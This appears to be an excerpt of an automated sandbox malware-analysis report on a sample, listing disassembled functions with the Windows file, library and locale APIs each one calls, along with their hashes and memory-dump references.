                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentVariable
                                                                                                  • String ID: sfxcmd$sfxpar
                                                                                                  • API String ID: 1431749950-3493335439
                                                                                                  • Opcode ID: 2a87fe6e85850c99bf9f592e4c1e0e0bef136a6a9749a2fa22cf5badfb3d2306
                                                                                                  • Instruction ID: f43a874f8336cce9fdf8b1b865adf3a2402cba99439b4b75ff827e2ae28ef925
                                                                                                  • Opcode Fuzzy Hash: 2a87fe6e85850c99bf9f592e4c1e0e0bef136a6a9749a2fa22cf5badfb3d2306
                                                                                                  • Instruction Fuzzy Hash: 74F0A7B260922CA6CB202BD58C06BEB375CAF45781B044811BDC595051E6F489C0EAE0
                                                                                                  Function 00909785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1082 909785-909791 1083 909793-90979b GetStdHandle 1082->1083 1084 90979e-9097b5 ReadFile 1082->1084 1083->1084 1085 909811 1084->1085 1086 9097b7-9097c0 call 9098bc 1084->1086 1087 909814-909817 1085->1087 1090 9097c2-9097ca 1086->1090 1091 9097d9-9097dd 1086->1091 1090->1091 1092 9097cc 1090->1092 1093 9097ee-9097f2 1091->1093 1094 9097df-9097e8 GetLastError 1091->1094 1095 9097cd-9097d7 call 909785 1092->1095 1097 9097f4-9097fc 1093->1097 1098 90980c-90980f 1093->1098 1094->1093 1096 9097ea-9097ec 1094->1096 1095->1087 1096->1087 1097->1098 1100 9097fe-909807 GetLastError 1097->1100 1098->1087 1100->1098 1102 909809-90980a 1100->1102 1102->1095
                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00909795
                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 009097AD
                                                                                                  • GetLastError.KERNEL32 ref: 009097DF
                                                                                                  • GetLastError.KERNEL32 ref: 009097FE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$FileHandleRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 2244327787-0
                                                                                                  • Opcode ID: d096d9c8480eb9c17e2479d1890810136075ad7c157cdd38d4df4f968c036b0c
                                                                                                  • Instruction ID: 15f94ffd4d88062c43a099973e47de9579a319688aaaf4b7c1b8e37109ae0eb5
                                                                                                  • Opcode Fuzzy Hash: d096d9c8480eb9c17e2479d1890810136075ad7c157cdd38d4df4f968c036b0c
                                                                                                  • Instruction Fuzzy Hash: A2118E32914204EFDF209F64C804A6A37ADFB46325F10CA29F856852D2D7789E44EB61
                                                                                                  Function 0092AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00923F73,00000000,00000000,?,0092ACDB,00923F73,00000000,00000000,00000000,?,0092AED8,00000006,FlsSetValue), ref: 0092AD66
                                                                                                  • GetLastError.KERNEL32(?,0092ACDB,00923F73,00000000,00000000,00000000,?,0092AED8,00000006,FlsSetValue,00937970,FlsSetValue,00000000,00000364,?,009298B7), ref: 0092AD72
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0092ACDB,00923F73,00000000,00000000,00000000,?,0092AED8,00000006,FlsSetValue,00937970,FlsSetValue,00000000), ref: 0092AD80
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 3177248105-0
                                                                                                  • Opcode ID: c83add5bca0ca12889155bdd2b8cf7eb8236aa5c644666c52a235d46ae406185
                                                                                                  • Instruction ID: 471abfc8756cadf93e95f688b059fcb07f701761309efc99679a5520abff16b3
                                                                                                  • Opcode Fuzzy Hash: c83add5bca0ca12889155bdd2b8cf7eb8236aa5c644666c52a235d46ae406185
                                                                                                  • Instruction Fuzzy Hash: 8C014233269232AFC7318B68BC44A977BACEF00BB37200A20FC06D35D4C720C8018AE1
                                                                                                  Function 00909F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0090D343,00000001,?,?,?,00000000,0091551D,?,?,?), ref: 00909F9E
                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0091551D,?,?,?,?,?,00914FC7,?), ref: 00909FE5
                                                                                                  • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0090D343,00000001,?,?), ref: 0090A011
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite$Handle
                                                                                                  • String ID:
                                                                                                  • API String ID: 4209713984-0
                                                                                                  • Opcode ID: 096363e679af7fc3a5f5366fab83540e426314f56753958740454c32b0fd589f
                                                                                                  • Instruction ID: c0032636c7f5bae442d90f14937aa3ea52b472bce5b0745312843d8756f3789d
                                                                                                  • Opcode Fuzzy Hash: 096363e679af7fc3a5f5366fab83540e426314f56753958740454c32b0fd589f
                                                                                                  • Instruction Fuzzy Hash: 6C31907124830AAFDB14CF20D818BAE77A9EF85715F044919F9819B2D0C775AD48CFA2
                                                                                                  Function 0090A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0090C27E: _wcslen.LIBCMT ref: 0090C284
                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0090A175,?,00000001,00000000,?,?), ref: 0090A2D9
                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0090A175,?,00000001,00000000,?,?), ref: 0090A30C
                                                                                                  • GetLastError.KERNEL32(?,?,?,?,0090A175,?,00000001,00000000,?,?), ref: 0090A329
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2260680371-0
                                                                                                  • Opcode ID: 1825e0504ab4d5c7b468cc30ab6b6a82563dfd7c07d4d2b3e902aa4a9c098c11
                                                                                                  • Instruction ID: e12ef8f14c35e8595e65448b1faa2fec0387f488c90e0e42091709686e4532c7
                                                                                                  • Opcode Fuzzy Hash: 1825e0504ab4d5c7b468cc30ab6b6a82563dfd7c07d4d2b3e902aa4a9c098c11
                                                                                                  • Instruction Fuzzy Hash: BD01B135610314AEEF21AB754C0ABED328C9F0A780F044424F901E60D1D768DA8196F6
                                                                                                  Function 0092B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0092B8B8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Info
                                                                                                  • String ID:
                                                                                                  • API String ID: 1807457897-3916222277
                                                                                                  • Opcode ID: ce1af82b61ed5b25c1ff2028cc32b8cb060dadbf54c0563d0666b6fc99f513be
                                                                                                  • Instruction ID: e6ef189af8f2673d02208451c882723028492461ac79fca7a26ba4131e1ca8cb
                                                                                                  • Opcode Fuzzy Hash: ce1af82b61ed5b25c1ff2028cc32b8cb060dadbf54c0563d0666b6fc99f513be
                                                                                                  • Instruction Fuzzy Hash: 6B4129755042AC9EDF218E28DC84BF6BBEDDB45308F1408ECE69A86146D3359A85DF60
                                                                                                  Function 0092AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0092AFDD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: String
                                                                                                  • String ID: LCMapStringEx
                                                                                                  • API String ID: 2568140703-3893581201
                                                                                                  • Opcode ID: 8d6bc9c92abfbdd7b78624a8acc439ad62b14c38c7052460e98da6263f7fe664
                                                                                                  • Instruction ID: 0e4449ebafe9d16f32464856d00ee6ebc84a853fca4d7c253bfbe6ba4982b899
                                                                                                  • Opcode Fuzzy Hash: 8d6bc9c92abfbdd7b78624a8acc439ad62b14c38c7052460e98da6263f7fe664
                                                                                                  • Instruction Fuzzy Hash: D9014C7254411EBBCF129F90ED01EEE7F62EF48754F014254FE1465160C6368931EF81
                                                                                                  Function 0092AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0092A56F), ref: 0092AF55
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountCriticalInitializeSectionSpin
                                                                                                  • String ID: InitializeCriticalSectionEx
                                                                                                  • API String ID: 2593887523-3084827643
                                                                                                  • Opcode ID: ba8f49aa1f6b4b5864426ab4bd10d9d805f8bf508951a824bfc2ceb1fdb30d04
                                                                                                  • Instruction ID: 1e9b6eab123e4d0c87817be0d5fdff760de6b9236ef7228996978804e4b168ad
                                                                                                  • Opcode Fuzzy Hash: ba8f49aa1f6b4b5864426ab4bd10d9d805f8bf508951a824bfc2ceb1fdb30d04
                                                                                                  • Instruction Fuzzy Hash: 31F0B47668921CBBCB115F95DC02EAEBF61EF44711F014165FD0956260DA315A10AF86
                                                                                                  Function 0092ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Alloc
                                                                                                  • String ID: FlsAlloc
                                                                                                  • API String ID: 2773662609-671089009
                                                                                                  • Opcode ID: 66a099eb437a7cb7c83a5ef98a598b2c43de762311bcc488bb053c9f6b48306b
                                                                                                  • Instruction ID: 41ab33e9feee32ad22d99b0fe13c82f12e6e04935c64ac596297f28df411e95e
                                                                                                  • Opcode Fuzzy Hash: 66a099eb437a7cb7c83a5ef98a598b2c43de762311bcc488bb053c9f6b48306b
                                                                                                  • Instruction Fuzzy Hash: 43E0E57268922C7BC611ABA5EC02A6EBB54DB84721F0202A9FC0597280CD705E409ED6
                                                                                                  Function 0091EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091EAF9
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID: 3Ro
                                                                                                  • API String ID: 1269201914-1492261280
                                                                                                  • Opcode ID: 1a35ee2781db100ade516f357f008f089b93ca110b07eff813a9036a9101be09
                                                                                                  • Instruction ID: a6b7eb6a850400030effb9945a1af8e264a9b124e8b8ba201c71ed7ffc1fea01
                                                                                                  • Opcode Fuzzy Hash: 1a35ee2781db100ade516f357f008f089b93ca110b07eff813a9036a9101be09
                                                                                                  • Instruction Fuzzy Hash: 70B012CA39A5477C310462001D03C7B015CC9C1F95330C42EFC00E4481DC821C860831
                                                                                                  Function 0092BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0092B7BB: GetOEMCP.KERNEL32(00000000,?,?,0092BA44,?), ref: 0092B7E6
                                                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0092BA89,?,00000000), ref: 0092BC64
                                                                                                  • GetCPInfo.KERNEL32(00000000,0092BA89,?,?,?,0092BA89,?,00000000), ref: 0092BC77
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CodeInfoPageValid
                                                                                                  • String ID:
                                                                                                  • API String ID: 546120528-0
                                                                                                  • Opcode ID: 3a20517717972d17a45f7c554e7537de08a4961e317db2c3a7ce3cce91983864
                                                                                                  • Instruction ID: ce2d1bde97889d8a2cfa5f882d048273538c7da970b511d3bafbc31f10366ccf
                                                                                                  • Opcode Fuzzy Hash: 3a20517717972d17a45f7c554e7537de08a4961e317db2c3a7ce3cce91983864
                                                                                                  • Instruction Fuzzy Hash: 195188B1A002659FDB20DF35E8817FBBBF8EF41300F18446ED4968B295D7389945DB90
                                                                                                  Function 00909A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00909A50,?,?,00000000,?,?,00908CBC,?), ref: 00909BAB
                                                                                                  • GetLastError.KERNEL32(?,00000000,00908411,-00009570,00000000,000007F3), ref: 00909BB6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 2976181284-0
                                                                                                  • Opcode ID: 3a022cc5ebb632b2ea0816da8033679ca5577c365be3675815a8e074129a280f
                                                                                                  • Instruction ID: ef0e962f434bd79948a03d95de738a11e4ad9c2123438491ed6a6c76cc939490
                                                                                                  • Opcode Fuzzy Hash: 3a022cc5ebb632b2ea0816da8033679ca5577c365be3675815a8e074129a280f
                                                                                                  • Instruction Fuzzy Hash: D441E1306043028FDB24DF19E58456AB7E9FFD4730F148A2DE891832E2D774ED448B91
                                                                                                  Function 0092BA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 009297E5: GetLastError.KERNEL32(?,00941030,00924674,00941030,?,?,00923F73,00000050,?,00941030,00000200), ref: 009297E9
                                                                                                    • Part of subcall function 009297E5: _free.LIBCMT ref: 0092981C
                                                                                                    • Part of subcall function 009297E5: SetLastError.KERNEL32(00000000,?,00941030,00000200), ref: 0092985D
                                                                                                    • Part of subcall function 009297E5: _abort.LIBCMT ref: 00929863
                                                                                                    • Part of subcall function 0092BB4E: _abort.LIBCMT ref: 0092BB80
                                                                                                    • Part of subcall function 0092BB4E: _free.LIBCMT ref: 0092BBB4
                                                                                                    • Part of subcall function 0092B7BB: GetOEMCP.KERNEL32(00000000,?,?,0092BA44,?), ref: 0092B7E6
                                                                                                  • _free.LIBCMT ref: 0092BA9F
                                                                                                  • _free.LIBCMT ref: 0092BAD5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorLast_abort
                                                                                                  • String ID:
                                                                                                  • API String ID: 2991157371-0
                                                                                                  • Opcode ID: 2092c69c3351ed6febfc50a9646c70572c13e38f25720b3c13736bd6237d3139
                                                                                                  • Instruction ID: f45096ef73b5ecf0ef2086804ba0f73d2497f77d29cbecd5e6cbb0210d18edd1
                                                                                                  • Opcode Fuzzy Hash: 2092c69c3351ed6febfc50a9646c70572c13e38f25720b3c13736bd6237d3139
                                                                                                  • Instruction Fuzzy Hash: 3E31D931904229AFDB10EFA8F545B9D77F9EF80320F254099E5049B2A6EB329D40DB50
                                                                                                  Function 00901E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 00901E55
                                                                                                    • Part of subcall function 00903BBA: __EH_prolog.LIBCMT ref: 00903BBF
                                                                                                  • _wcslen.LIBCMT ref: 00901EFD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog$_wcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2838827086-0
                                                                                                  • Opcode ID: ee10395d9460e0b268adbae74942e3f195d81739a5d3442a94503b21f510f643
                                                                                                  • Instruction ID: cc5515e8effc673757cceb19eeb09f2c0967930c5e866d82013d669acdba59bb
                                                                                                  • Opcode Fuzzy Hash: ee10395d9460e0b268adbae74942e3f195d81739a5d3442a94503b21f510f643
                                                                                                  • Instruction Fuzzy Hash: 57315A71A04209AFCF11DF98C945AEEFBFAAF88304F10446EF845A7291CB365E40CB60
                                                                                                  Function 00909DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,009073BC,?,?,?,00000000), ref: 00909DBC
                                                                                                  • SetFileTime.KERNELBASE(?,?,?,?), ref: 00909E70
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
